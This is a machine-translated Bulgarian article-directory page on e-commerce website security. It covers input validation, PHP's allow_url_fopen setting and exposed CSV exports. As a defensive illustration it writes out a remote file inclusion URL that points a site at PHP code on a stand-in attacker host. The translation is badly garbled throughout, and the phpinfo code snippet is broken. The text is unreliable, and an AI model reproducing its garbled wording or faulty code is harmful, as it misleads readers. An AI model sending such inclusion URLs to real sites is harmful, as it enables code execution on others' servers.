E-Commerce Сигурност - пропуските на дупки в сигурността

"Електронна търговия" Член
Член началото на Директорията

Всички категории

Интернет и електронния бизнес

Електронна търговия

E-Commerce Сигурност - пропуските на дупки в сигурността Като експерт Автор: Пол Робъртс \| член Анотация
Word Count: 520 думи \| Прегледи: 119 изглед (а)

Сигурност в един сайт за електронна търговия трябва да бъде голямо внимание при развитието на електронната търговия уеб сайт или софтуер. Строителна фирма трябва да бъде наясно с всички съображения за сигурност при разработването на сайта. По електронна търговия става все по-често срещано в наши дни, броят на сигурността атаки със сигурност се увеличава. Параноята е нещо здравословно за електронна търговия фирми сайт, ние трябва да водят до портата с въпросите на сигурността, и да ни ушите и очите отворени. Въпреки че след пропуските са сериозни, следните вратички, ако присъстват, са лесно фиксиран.

Изброените по-долу са някои съображения за сигурност да бъдат включени при разработването на даден сайт. Тази статия не се отнася до д-shoplifting, моля, вижте ми отделна статия по този въпрос.

Потребителски вход - на всеки вход, независимо дали това се навлиза в количество, търсене на даден продукт, въвеждане на име и т.н., трябва да бъдат валидирани за подозрителни знаци. Ако това не бъде направено, е възможно да влезе "?>", крайната тагове края на PHP и изпълни някои PHP код.

Това е много по-безопасна позволи числа и символи Az (столици са включени) и 0-9 и нищо друго, вместо да се направи списък на всички характер, че не трябва да бъде там. Утвърждаването скрипт трябва да преминете през всеки от героите един по един. Това трябва да се извършва чрез проверка в сървъра страна, не Javascript. Използване на сървър утвърждаване страна вход е от съществено значение за предпазване от нежелана символи

Съществува още една важна при изпълнение на PHP код. При използване на PHP е създаването наречен allow_url_fopen, който позволява отварянето на файлове от скрипт PHP. Тази настройка трябва да бъде изключен, освен ако не е абсолютно необходимо.

Само си представете имате PHP скриптове за двете фиксирани колонтитули, както и за достъп до уеб страниците трябва да въведете в http://www.mysite.com/index.php?page=page2. Достатъчно е злонамерен потребител да тече по сценарий на изменение на тези параметри, като въведете в "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" с някои PHP код във файла "hacker.txt". Можеше да се случи нещо, PHP файлове чете, изтрити, жизненоважна информация откраднати.

Ако не сте сигурни дали тази настройка е включена или не, моля копирайте следния код PHP в текстов файл и да го качите на вашия уеб сървър:

phpinfo ();
?>

Когато получите достъп до скрипта на вашия уеб сървър, трябва да се намира на създаването allow_url_fopen по конфигурация.

А компютърен потребител, при нормални обстоятелства не може да намери стойността на тази настройка.

Бъдете внимателни на изнесените данни, като поръчки, продукти в MySQL и CSV файлове. Ако тези данни са изнесени от сценария и се съхраняват на уеб сървъра под обща, т.е. името на файла. http://www.mysite.com/admin/output_tables.csv. Това е наистина само един проблем, когато изнасят данни пребивава в даден файл в директорията, която е публично достъпна. Има два начина да се предотврати тази вратичка за сигурност - Първо трябва изходния файл зад защитени с парола директория, от друга страна има данни, разположени в текстовото поле елемент на HTML формата на скрипт. В storeowner може след това да копирате тази информация от textfile и да създадете нов файл на компютъра си и поставете информацията тук.

Достатъчно е един хакер да намерите това име на файл като проверите за електронна търговия демо сайт софтуер и гледам за същото име на файл на сайта за недвижими.

За автора / Био Автор

Пол Робъртс
Аз тичам дружество, специализирани в разработката на софтуер за електронна търговия, оптимизация за търсещи машини, както и печат Оценка софтуер, наречен ROBO Design Solutions. Аз също да разработят и Нова Зеландия E-Commerce Solutions и софтуер под името ROBO Дизайн.

Article Source: http://www.be.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Tags: e-commerce, ecommerce, security, loophole, loopholes, plugging, secure, validation

Article Submitted: 2008-06-05 | This Article has been viewed 119 times.

Rate Article

Related Videos
Play Video How to Strengthen Network Security with Cisco Network Manager	Play Video Understanding your Home Network Router #5 - Secure Your Network with WPA2	Play Video Learn About Secure Computing	Възпроизвеждане на видео Как да поддържате компютъра си охраняем	Възпроизвеждане на видео Как да Проверете настройките за защита в Windows Vista

Още "Електронна търговия" Свързани членове

Изброените по-долу са по-предмети, свързани с по-горе статия от "Електронна търговия" Член категория.

Хората се интересуват от по-горе статия "E-Commerce Сигурност - пропуските на дупки в сигурността" са също се интересуват от подобни изделия, изброени по-долу:

Максимално използване от вашия бизнес Електронна търговия

Стартиране на е-бизнеса търговия не е само за запазване на Вашия уебсайт, и да вървят. Клиентите разчитат на способността Ви да им служат по телефон, факс, електронна поща, или по друг начин, и то изисква всичките си системи, за да се стреми да бъде в състояние да изпълни исканията на клиентите.

На E-Commerce

Само няколко дни назад, бях като чат с моя приятел. Той е чест 1-ви рожден ден на бебето си и трябваше да тичам между родния му в Керала и Ченай, работното си място. Той и неговата съпруга пътували между тези места най-малко 4 пъти в последния един месец.

Salehoo и световни марки?

Ако сте били прави електронна търговия, за всеки период от време, щеше да знае, че там са по-истински scamers от доставчиците на услугите на едро dropship директория. В света на електронния бизнес, Salehoo и световни марки и двете са уважавани доставчици на услуги, които са си спечелили популярност през последните няколко години.

Salehoo - надежден Търговия на едро и Капка кораба Recource

Ако някога сте били онлайн търговец на дребно, най-вероятно вече са чували за Salehoo или дори да я използват като предимство. Ако са само началото на бизнеса си, може да бъде объркана с смесени Salehoo коментарите там. Сега, нека погледнем какво Salehoo е наистина всичко и услугите, които предлагат, много от които са склонни да пренебрегват.

Електронна търговия Светът ново онлайн пазаруване Мол

Колко хора знаете ли, че са закупили нещо тук? Ако си като мен, съвсем малко, затова, че електронната търговия е най-новата онлайн шопинг мол. Но който управлява тези онлайн магазини? Хората просто като теб и мен, ето защо този бизнес процъфтява и ще продължи да процъфтява и сега и в бъдеще.

Възползват от Капка Доставка Електроника Услуги

Ако сте голям фен на най-новите електронни продукти, може да бъде изкушен от идеята да пуснете собствен онлайн електрониката. Тя не е толкова трудно да се стартира, когато сте приели всички предимства на правото капка корабоплаването електроника услуга и има много за вас да избирате.

Ползите за притежаване на собствен онлайн магазин

Гледал ли си отивам в местния магазин удобство и се чудя какво би било, ако го като собственост? Искате ли да бъде добър собственик, ще хора като теб? Ами тази статия ще ви покажем предимствата на притежаване на собствен онлайн магазин, или известна като електронна търговия, която се различава от реалното местно магазин удобство.

Член началото на Директорията

Всички категории

Интернет и електронния бизнес

Електронна търговия

�

Не можете да намерите това, което търсите? Опитайте търсене в Google!

(Ние обслужваме по целия свят - Места актуализира в неделя, 06 December 2009 11:50 ч., Сингапур)

Съединените щати на Америка, САЩ. Обединеното кралство, Великобритания (Англия, Шотландия, Уелс, Северна Ирландия). Канада. Афганистан. Албания. Алжир. Американска Самоа. Андора. Ангола. Ангуила. Антарктида. Антигуа & Барбуда. Аржентина. Армения. Аруба. Австралия. Австрия. Азербайджан. Бахамските острови. Бахрейн. Бангладеш. Барбадос. Беларус. Белгия. Белиз. Бенин. Бермудските острови. Бутан. Боливия. Бонер. Босна и Херцеговина. Ботсуана. Бразилия. Британски Вирджински острови. Бруней Darrusalam. България. Буркина Фасо. Бурунди. Камбоджа. Камерун. Кабо Верде. Кайманови острови. Централна Африканска република. Чад. Англо-нормандските острови. Чили. Китай. Остров Рождество. Колумбия. Коморски острови. Конго. Конго (Dem. представителство). Острови Кук. Коста Рика. Кот д'Ивоар. Хърватия. Куба. Кюрасао. Кипър. Чешката република. Дания. Джибути. Доминика. Доминиканската република. Източен Тимор. Еквадор. Египет. Ел Салвадор. Екваториална Гвинея. Еритрея. Естония. Етиопия. Фолкландските острови и зависимости. Фарьорските острови. Фиджи. Финландия. Франция. Френска Гвиана. Френска Полинезия. Габон. Гамбия. Газа. Грузия. Германия. Гана. Гибралтар. Гърция. Гренландия. Гренада. Гваделупа. Гуам. Гватемала. Гвинея. Гвинея-Бисау. Гвиана. Хаити. Хавайските острови. Хондурас. Хонг Конг. Унгария. Исландия. Индия. Индонезия. Иран. Ирак. Остров Ман. Израел. Италия. Кот д'Ивоар. Ямайка. Япония. Атол Джонстън. Йордания. Казахстан. Кения. Кирибати. Корея (Северна). Корея (Южна). Кувейт. Киргизстан. Лаос. Латвия. Ливан. Подветрената страна острови. Лесото. Либерия. Либия. Лихтенщайн. Литва. Люксембург. Макао. Македония. Мадагаскар. Малави. Малайзия. Малдивските острови. Мали. Малта. Маршалови острови. Мартиника. Мавритания. Мавриций. Мексико. Микронезия (Федерални щати). Мидуей острови. Молдова. Монако. Монголия. Монсерат. Мароко. Mosquito крайбрежие. Мозамбик. Мианмар (Бирма). Намибия. Науру. Остров Наваса. Непал. Холандия. Холандски Антили. Нова Каледония. Нова Зеландия. Никарагуа. Нигер. Нигерия. Ниуе. Норфолк. Северни Мариански острови. Норвегия. Оман. Пакистан. Палау. Палестина. Панама. Папуа Нова Гвинея. Параселски острови. Парагвай. Перу. Филипините. Питкерн. Полша. Португалия. Пуерто Рико. Катар. Реюнион. Румъния. Русия. Руанда. Ryukyu острови. Света Елена. Сейнт Китс и Невис. Сейнт Лусия. Сен Пиер и Микелон &. Сейнт Винсент & Гренадини. Самоа. Сан Марино. Сао Томе & Принсипи. Саудитска Арабия. Сенегал. Сърбия. Сейшелските острови. Сиера Леоне. Сингапур. Словакия. Словения. Соломоновите острови. Сомалия. Южна Африка. Испания. Шри Ланка. Судан. Суринам. Свазиленд. Швеция. Швейцария. Сирия. Тайван. Таджикистан. Танзания. Тайланд. Того. Тонга. Транскей. Тринидад & Тобаго. Тунис. Турция. Туркменистан. Търкс и Кайкос. Тувалу. Американските Вирджински острови. Уганда. Украйна. Обединените арабски емирства. Горна Волта. Уругвай. Узбекистан. Вануату. Ватикана (Светия престол). Венецуела. Виетнам. Уейк. Windward острови. Йемен. Югославия. Заир. Замбия. Зимбабве

Copyright © 2005 -- Лари от Лим, Сингапур - член търсачка директория ArticleSphere.com ™
Всички права запазени. Всички търговски марки и Servicemarks са собственост на съответните собственици.